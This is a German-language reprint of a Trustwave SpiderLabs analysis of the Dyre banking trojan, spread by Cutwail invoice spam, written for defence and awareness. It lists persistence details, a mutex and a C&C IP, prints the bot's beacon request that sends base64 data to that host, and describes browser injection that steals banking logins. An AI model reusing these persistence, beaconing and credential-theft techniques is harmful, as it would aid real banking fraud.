Trustwave SpiderLabs: Analyse eines neuen Bankentrojaners, der über Cutwail verbreitet wird
Der Cutwail Spambot verfügt über eine lange Historie, was die Versendung von Spam-eMails mit gefährlichen Dateianhängen wie Zbot, dem Blackhole Exploit Kit und Cryptolocker angeht. Ein weiterer Trick im Portfolio von Cutwail ist die Verwendung von Verlinkungen auf populäre Datei Hosting Dienste. In den letzten Wochen konnten die Trustwave SpiderLabs Spamnachrichten beobachten, in denen behauptet wurde, dass es sich hierbei um eine unbezahlte Rechnung einer bestimmten Bank handeln würde.
Auflistung von Spam-Emails der „Outstanding Invoice“ Kampagne, die von einem Trustwave Secure Email Gateway gefiltert wurden
Aktuell gehören zu den gängigsten Themen gefährlicher Spam-eMail Kampagnen Behauptungen über angebliche Rechnungen oder Produktbestellungen, die entweder als ZIP-Datei Anhang oder als Link auf eine im Internet gehostete ZIP-/RAR Datei in der eMail enthalten sind. Die aktuelle Massenkampagne beinhaltet einen Link auf einen der beiden Filesharing-Dienste Dropbox oder Cubby. Bei den gehosteten Dateien handelt es sich um ZIP-Dateien mit Dateinamen wie „invoice_<zahl>.zip“ oder „document_<zahl>.zip“.
Der enthaltene Malware Payload
Nach dem Herunterladen und Auspacken der gepackten Malware Datei versucht sich die Datei mit Hilfe eines Adobe PDF Icons zu tarnen und gutgläubige Nutzer in den Glauben zu versetzen, dass es sich hierbei um eine harmlose komprimierte Dokumentendatei handelt. Wenn die Datei angeklickt wird, platziert die ausführbare (EXE) Datei eine Kopie von sich selbst in das „Windows %AppData%“ (Application Data) Verzeichnis mit dem Namen „googleupdaterr.exe“. Anschließend erzeugt die Datein einen Autorun-Eintrag, um sich selbst beim Start von Windows auszuführen:
HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run
GoogleUpdate = „%AppData%\googleupdaterr.exe“
Ein spezieller Code, der im Hauptbestandteil der Malware-Datei enthalten ist, wird anschließend in die „Explorer.exe“ Datei injiziert. Zudem wird eine Infektionsmarkierung im Explorer.exe Prozess durch die Erstellung eines Mutex mit dem Namen „RangisMutex5“ angelegt.
AntiVirus Unternehmen haben das Ladeprogramm dieses neuen Bankentrojaners und den DLL-Code, der in die Explorer.exe injiziert wird, synchronisiert mit dem Namen „Dyranges“ oder „Trojan.Dyzap“ benannt. Diese Benennung erfolgte vermutlich aufgrund des DBP Pfades, der im Hauptteil der Malware enthalten ist:
Der DBP Pfad innerhalb der Malware verweist auf ein Projekt mit dem Namen „DYRE“. Eine interessante Nebenerkenntnis aus dieser Codeabschnittanalyse: „zapuskator2.pdb“ ist die russische Übersetzung von „executer2.pdb“.
Anschließend wird eine Konfigurationsdatei mit dem Namen „userdata.dat“ in das „%AppData“ Verzeichnis abgelegt, die die BotID, eine verschlüsselte Konfiguration und eine Boolean´sche Variable mit dem Namen „AUTOBACKCONN“ enthält. Es kann davon ausgegangen werden, dass die Veränderung des AUTOBACKCONN Wertes auf „true“ zu einer permanenten Verbindung des Bots mit seinem Command und Control Server führt.
Kurz nach einer erfolgreichen Malware Installation sendet der Trojaner die nachfolgende GET-Anfrage an seinen Command und Control Server mit der IP-Adresse 192.99.6.61. Hier die Kommunikationssequenz mit dem Server:
- Die erste GET-Anfrage ist die Frage nach dem „publicKey“ im Format „/cho1017/<botid>/5/publickey/“.
- Der Bot berichtet dann anschließend die Version des Betriebssystems des infizierten Systems an seinen C&C Server im Format „/cho1017/<botid>/0/<Windows Version>/“.
- Anschließend erfolgt eine noch nicht genauer analysierte GET-Anfrage in Form von „/58/1/“, auf die der C&C Server mit der ThreadID antwortet.
Nach diesem ersten Handshake mit dem C&C Server versucht der Trojaner die Verbindung mit seinem Server durch fortwährende GET-Anfragen im nachfolgenden Format aufrecht zu erhalten:
GET /cho1017/<botid>/1/<base64 data>/
HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61
Dieser Bankentrojaner verankert sich in den Browsern von Google Chrome, Firefox und dem Internet Explorer. Diese Injektionsfunktion in die Browser ermöglicht dem Trojaner Suchanfragen der Nutzer, Browser-Cookies und sensible Banking-Informationen gezielt abzuhören.
Der Trojaner überwacht zudem eine ganze Liste von Bankenwebseiten. Wenn ein Opfer eine solche überwachte Bankenwebseite aufruft, dann werden alle Informationen, die das Opfer eingibt, abgefangen und an den Server der Cyberkriminellen gesendet. Der im Anschluss aufgeführte Ausschnitt aus dem Code ist die Funktion, mit deren Hilfe der Trojaner die verschiedenen Banken-URLs überwacht und über die die abgefangenen Daten an eine Remote IP Adresse über Port 12081 gesendet werden.
Die nachfolgende Paketaufzeichnung zeigt die POST-Anfrage, die vom Trojaner mit dem Log-In auf der Bankenwebseite abgefangen wurde. Die POST-Daten, die die Log-In Anmeldedaten und Cookies enthalten, wurden an den Server der Cyberkriminellen gesendet.
Als Man-in-the-Middle Attacke sendet der Trojaner alle abgefangenen POST-Daten an die IP-Adresse der Cyberkriminellen. Und die Daten werden zudem über die normale SSL-verschlüsselte Verbindung zwischen dem Browser des Opfers und dem Bank Webserver übermittelt. Somit bleiben die verdächtigen Aktivitäten, die im Hintergrund passieren, unbemerkt.
Zum Zeitpunkt der Erstellung dieser Analyse war die IP-Adresse der Cyberkriminellen bereits nicht mehr aktiv erreichbar. Die Trustwave Spiderlabs können nicht genau sagen, ob der Server der Cyberkriminellen vom Netz genommen oder einfach nur auf einen anderen Server verlagert wurde. Nach den Analysen der Trustwave Spiderlabs war die IP-Adresse der Angreifer mit dem aus dem Untergrund bekannten Drop Ship Dienst Global Backpoint verlinkt, der sehr beliebt bei Kreditkartenbetrügern (und anderen Betrügern) ist. Über diesen Dienst werden auch verschiedenste Phishing Webseiten gehostet, die auf Banken abzielen.
Die Log-In Seite von Global Backpoint
Zusammenfassend wieder einmal der generelle Ratschlag: Email-Nutzer sollten niemals auf Links oder Dateianhänge in Emails klicken, deren Absender ihnen nicht persönlich und zu 100% bekannt ist (und vor allem – von eMails, die unaufgefordert und ohne direktem Zusammenhang zu persönlichen Aktivitäten zugesendet wurden). Eine zusätzliche Aufmerksamkeit sollte man zudem bei Links walten lassen, die auf gängige File Sharing Dienste wie Dropbox oder Cubby verweisen, da die Cyberkriminellen mittlerweile begonnen haben, auch diese Dienste für ihre Zwecke zu missbrauchen. Die Nutzer des Trustwave Secure Email Gateways sind vor dieser gefährlichen Spam-eMail Kampagne natürlich automatisch geschützt.
Quelle: Trustwave SpiderLabs Weblog – Autor: Rodel Mendrez
Über Trustwave
Trustwave hilft Unternehmen, sich vor den Cyberbedrohungen zu schützen, die eigenen Daten abzusichern und die Sicherheitsrisiken zu minimieren. Mit den eigenen Cloud- und Managed Security Services, den integrierten Technologien und einem globalen Team von IT-Sicherheitsexperten, ethischen Hackern und Forschern ermöglicht Trustwave Unternehmen, Organisationen und Behörden ihre Informationssicherheit und Compliance-Programme vor allem auch im Zuge geschäftlicher IT-Herausforderungen wie Big Data, BYOD und Social Media zu gewährleisten. Über zwei Millionen Geschäftskunden haben sich bereits der Trustwave TrustKeeper® Cloud Plattform angeschlossen, über die Trustwave automatisiert, effizient und kosteneffektiv den richtigen Datenschutz, ein umfassendes Risikomanagement und einen intelligenten Schutz vor Bedrohungen bereitstellt. Trustwave ist ein im Privatbesitz befindliches Unternehmen mit Hauptsitz in Chicago (USA). Das Unternehmen verfügt über Kunden in 96 Ländern auf der ganzen Welt. Weitere Informationen zu Trustwave finden Sie unter www.trustwave.com